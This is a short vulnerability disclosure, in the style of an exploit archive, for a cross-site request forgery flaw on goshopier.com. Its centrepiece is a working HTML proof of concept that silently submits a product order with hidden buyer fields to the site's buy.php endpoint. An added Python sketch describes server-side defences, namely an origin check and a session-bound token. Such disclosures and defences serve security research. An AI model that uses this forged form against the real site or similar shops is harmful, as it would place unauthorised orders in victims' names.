Turkey/shopier CSRF Poc in goshopier.com

2018.04.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Author: Yusuf Furkan
Exploit title: Turkey/shopier CSRF Poc in goshopier.com
Twitter: R3DC0D3R1

Hi, my name is Yusuf Furkan. My CSRF PoC in goshopier.com.

PoC:

<html>
  <!-- CSRF PoC - generated by Yusuf -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.goshopier.com/ShowProduct/buy.php" method="POST">
      <input type="hidden" name="name" value="sdasasa" />
      <input type="hidden" name="surname" value="saasasdsad" />
      <input type="hidden" name="tckn" value="15786352" />
      <input type="hidden" name="address" value="japonya&#32;tokyo" />
      <input type="hidden" name="postcode" value="" />
      <input type="hidden" name="city" value="BalÄ&#177;kesir" />
      <input type="hidden" name="phone" value="&#40;555&#41;&#32;555&#32;&#45;&#32;52552115" />
      <input type="hidden" name="email" value="testcsrf&#64;gmail&#46;com" />
      <input type="hidden" name="note" value="" />
      <input type="hidden" name="productid" value="52971" />
      <input type="hidden" name="productcount" value="1" />
      <input type="hidden" name="opt1" value="" />
      <input type="hidden" name="opt2" value="" />
      <input type="hidden" name="opt3" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Location: Turkey
Note: Greetings to all friends from here :D

References:

Turkey web application Researcher
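The form above carries no anti-CSRF token field, so the following added example (not part of the original advisory and not the vendor's code) sketches the server-side gate that would reject it: an Origin/Referer check plus a session-bound HMAC token. The server code is not shown on the page, so the `csrf_token` field name, the session id, the secret, and the helper names are all assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (not from the advisory): a per-deployment secret, a server-side
# session id, and a hidden form field named "csrf_token".
SECRET = secrets.token_bytes(32)
ALLOWED_ORIGIN = "https://www.goshopier.com"


def _mac(session_id: str, nonce: str) -> str:
    return hmac.new(SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_token(session_id: str) -> str:
    """Token embedded in the genuine order form, bound to the visitor's session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_valid(session_id: str, token: str) -> bool:
    nonce, _, mac = token.partition(".")
    expected = _mac(session_id, nonce)
    # Compare as bytes in constant time; bytes also tolerate non-ASCII input.
    return bool(nonce) and hmac.compare_digest(mac.encode(), expected.encode())


def same_origin(headers: dict) -> bool:
    """Check Origin, falling back to Referer; reject when neither is present."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == ALLOWED_ORIGIN


def check_order_post(session_id: str, headers: dict, form: dict) -> tuple[bool, str]:
    """Gate to run before the order handler acts on the POSTed fields."""
    if not same_origin(headers):
        return False, "cross-origin request"
    if not token_valid(session_id, form.get("csrf_token", "")):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample: field names taken from the form above, values are placeholders.
FORGED_FORM = {"name": "a", "surname": "b", "productid": "52971", "productcount": "1"}
```

A form auto-submitted from another site fails the first check on its Origin header, and would still fail the second because the page cannot read the token issued to the victim's session.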

